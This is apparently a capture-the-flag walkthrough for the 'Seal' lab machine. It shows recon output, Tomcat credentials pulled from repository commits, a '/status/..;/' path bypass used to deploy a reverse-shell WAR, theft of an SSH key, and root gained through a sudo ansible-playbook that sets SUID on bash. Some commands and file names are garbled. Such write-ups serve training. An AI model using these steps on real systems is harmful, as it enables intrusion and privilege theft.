In this post, I would like to share a walkthrough of the Seal Machine.


This room has been considered difficulty rated as a medium machine

Information Gathering on Seal Machine


Once we have started the VPN connection, we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN 

<strong># Nmap 7.91 scan initiated Mon Jul 12 21:30:43 2021 as: nmap -sC -sV -oA intial -Pn 10.10.10.250
Nmap scan report for seal.htb (10.10.10.250)
Host is up (0.22s latency)
Not shown: 997 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 4b:89:47:39:67:3d:07:31:5e:3f:4c:27:41:1f:f9:67 (RSA)
|   256 04:a7:4f:39:95:65:c5:b0:8d:d5:49:2e:d8:44:00:36 (ECDSA)
|_  256 b4:5e:83:93:c5:42:49:de:71:25:92:71:23:b1:85:54 (ED25519)
443/tcp  open  ssl/http   nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Seal Market
| ssl-cert: Subject: commonName=seal.htb/organizationName=Seal Pvt Ltd/stateOrProvinceName=London/countryName=UK
| Not valid before: 2021-05-05T10:24:03
|_Not valid after:  2022-05-05T10:24:03
| tls-alpn: 
|_  http/1.1
| tls-nextprotoneg: 
|_  http/1.1
8080/tcp open  http-proxy
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 401 Unauthorized
|     Date: Tue, 13 Jul 2021 01:44:48 GMT
|     Set-Cookie: JSESSIONID=node0hnabifqaxoy718gb842iywilt193.node0; Path=/; HttpOnly
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 0
|   GetRequest: 
|     HTTP/1.1 401 Unauthorized
|     Date: Tue, 13 Jul 2021 01:44:46 GMT
|     Set-Cookie: JSESSIONID=node0ba5l1frprgu2fwdfykhazky6191.node0; Path=/; HttpOnly
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 0
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Tue, 13 Jul 2021 01:44:47 GMT
|     Set-Cookie: JSESSIONID=node016ot8bocmvot7y8baiml78ulf192.node0; Path=/; HttpOnly
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Content-Type: text/html;charset=utf-8
|     Allow: GET,HEAD,POST,OPTIONS
|     Content-Length: 0
|   RPCCheck: 
|     HTTP/1.1 400 Illegal character OTEXT=0x80
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 71
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
|   RTSPRequest: 
|     HTTP/1.1 505 Unknown Version
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 58
|     Connection: close
|     <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
|   Socks4: 
|     HTTP/1.1 400 Illegal character CNTL=0x4
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x4</pre>
|   Socks5: 
|     HTTP/1.1 400 Illegal character CNTL=0x5
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x5</pre>
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Server returned status 401 but no WWW-Authenticate header.
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.91%I=7%D=7/12%Time=60ECED14%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,F5,"HTTP/1\.1\x20401\x20Unauthorized\r\nDate:\x20Tue,\x2013\x2
SF:0Jul\x202021\x2001:44:46\x20GMT\r\nSet-Cookie:\x20JSESSIONID=node0ba5l1
SF:frprgu2fwdfykhazky6191\.node0;\x20Path=/;\x20HttpOnly\r\nExpires:\x20Th
SF:u,\x2001\x20Jan\x201970\x2000:00:00\x20GMT\r\nContent-Type:\x20text/htm
SF:l;charset=utf-8\r\nContent-Length:\x200\r\n\r\n")%r(HTTPOptions,10A,"HT
SF:TP/1\.1\x20200\x20OK\r\nDate:\x20Tue,\x2013\x20Jul\x202021\x2001:44:47\
SF:x20GMT\r\nSet-Cookie:\x20JSESSIONID=node016ot8bocmvot7y8baiml78ulf192\.
SF:node0;\x20Path=/;\x20HttpOnly\r\nExpires:\x20Thu,\x2001\x20Jan\x201970\
SF:x2000:00:00\x20GMT\r\nContent-Type:\x20text/html;charset=utf-8\r\nAllow
SF::\x20GET,HEAD,POST,OPTIONS\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequ
SF:est,AD,"HTTP/1\.1\x20505\x20Unknown\x20Version\r\nContent-Type:\x20text
SF:/html;charset=iso-8859-1\r\nContent-Length:\x2058\r\nConnection:\x20clo
SF:se\r\n\r\n<h1>Bad\x20Message\x20505</h1><pre>reason:\x20Unknown\x20Vers
SF:ion</pre>")%r(FourOhFourRequest,F6,"HTTP/1\.1\x20401\x20Unauthorized\r\
SF:nDate:\x20Tue,\x2013\x20Jul\x202021\x2001:44:48\x20GMT\r\nSet-Cookie:\x
SF:20JSESSIONID=node0hnabifqaxoy718gb842iywilt193\.node0;\x20Path=/;\x20Ht
SF:tpOnly\r\nExpires:\x20Thu,\x2001\x20Jan\x201970\x2000:00:00\x20GMT\r\nC
SF:ontent-Type:\x20text/html;charset=utf-8\r\nContent-Length:\x200\r\n\r\n
SF:")%r(Socks5,C3,"HTTP/1\.1\x20400\x20Illegal\x20character\x20CNTL=0x5\r\
SF:nContent-Type:\x20text/html;charset=iso-8859-1\r\nContent-Length:\x2069
SF:\r\nConnection:\x20close\r\n\r\n<h1>Bad\x20Message\x20400</h1><pre>reas
SF:on:\x20Illegal\x20character\x20CNTL=0x5</pre>")%r(Socks4,C3,"HTTP/1\.1\
SF:x20400\x20Illegal\x20character\x20CNTL=0x4\r\nContent-Type:\x20text/htm
SF:l;charset=iso-8859-1\r\nContent-Length:\x2069\r\nConnection:\x20close\r
SF:\n\r\n<h1>Bad\x20Message\x20400</h1><pre>reason:\x20Illegal\x20characte
SF:r\x20CNTL=0x4</pre>")%r(RPCCheck,C7,"HTTP/1\.1\x20400\x20Illegal\x20cha
SF:racter\x20OTEXT=0x80\r\nContent-Type:\x20text/html;charset=iso-8859-1\r
SF:\nContent-Length:\x2071\r\nConnection:\x20close\r\n\r\n<h1>Bad\x20Messa
SF:ge\x20400</h1><pre>reason:\x20Illegal\x20character\x20OTEXT=0x80</pre>"
SF:);
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul 12 21:32:32 2021 -- 1 IP address (1 host up) scanned in 109.27 seconds</strong>

We need to whitelist the domain name for the machine such as seal.htb 


Let’s open the browser and straight into the website interface.


We didn’t see any useful information appear on the website interface.



Let’s access the website via port 8080 and the website interface will look like shown in the screenshot above.


There’s a create one for us to create a new account

We should enter any details for the creation purpose so that we can log-in to the GitBucket Dashboard

Gaining Privileges Access on Seal Machine


Finally, we have managed to log into the Dashboard which the interface will look as above.


From the normal website previously, we notice that the web title called “Seal Market


The website will open the Seal Market App which the developer has done 13 commits to the application.


Without further ado, let’s open the commits page and see the content of the page.


I have managed to analyze the commits which appear here and there is one file (the code starts with ac210325af) that stood up compared to other files


I have found a tomcat folder within the commits that we open previously


There should be a file configuration that is saved as tomcat-users.xml which it might contain the username and password for the website


Finally, the username and password have been revealing on the configuration of tomcat-user.yml


From the Tomcat configuration, we notice there’s a manager-GUI that might lead to /manager/ directory. Let’s access the website via the credentials that we found previously


As a result, we did manage to gain access to Tomcat Web Application Manager. A malicious file will be needed to be uploaded on the website interface for future purposes.


However, we need to start our NC listener after we create a malicious file on our machine in order to get the reverse shell.


The upload process will look something as shown in the screenshot above.


We should inspect the packet from our BurpSuite Community tools after you click the deploy button.


We need to modify the packet where we should adding /status/..;/ before html and after manager directory. Next, we can click the forward button in order to send the packet to the server.


As a result, the file has been successfully saved on the Dashboard as shown in the screenshot above. In order to obtain the connection back to us, we need to click on the file (the same file that we save during the msfvenom activity)


When we look back on the reserve shell terminal, the connection has been returned back to us.

Maintaining Privileges Access


Let’s see which directory did we access it.


We need to look at /opt/backups/ directory where we sighted that playbook directory


Let’s read the content that has been stored within the run.yml file.


We managed to find a directory that we can use for further escalation to obtain a user flag.


No file is stored within the uploads directory.


Without further ado, We should be able to retrieve luis by executing the command “ls -n /home/luis/.ssh/id_rsa /var/lib/tomat9/webapps/ROOT/admin/dashboard/uploads


In the end, we managed to get id_rsa on the uploads directory but it’s unreadable in that directory. Due to that, we should be moving that file into /tmp directory


After that, we can copy-paste the id_rsa into our attacker’s machine where you will able to access the machine via ssh service.


Before we managed to log into the machine via ssh service, we need to give permission 600 to the id_rsa


We should be able to read the user flag by executing the command “cat user.txt

Escalate to Root Privileges Access


By running sudo -l command, we will manage to get SUID access to the machine. We can abuse the ansible-playbook assigned to root


We need to create the file (anyname.yml) which contains the following code

- hosts: localhost
   tasks:  
   - name: darknite
   command: "chmod +s /bin/bash"

In order to get root privileges access, we should execute the command “sudo /usr/bin/ansible-playbook anyname.yml


Voila! We have been able to get root privileges to access the machine


We can read teh root flag by executing “cat root.txt” command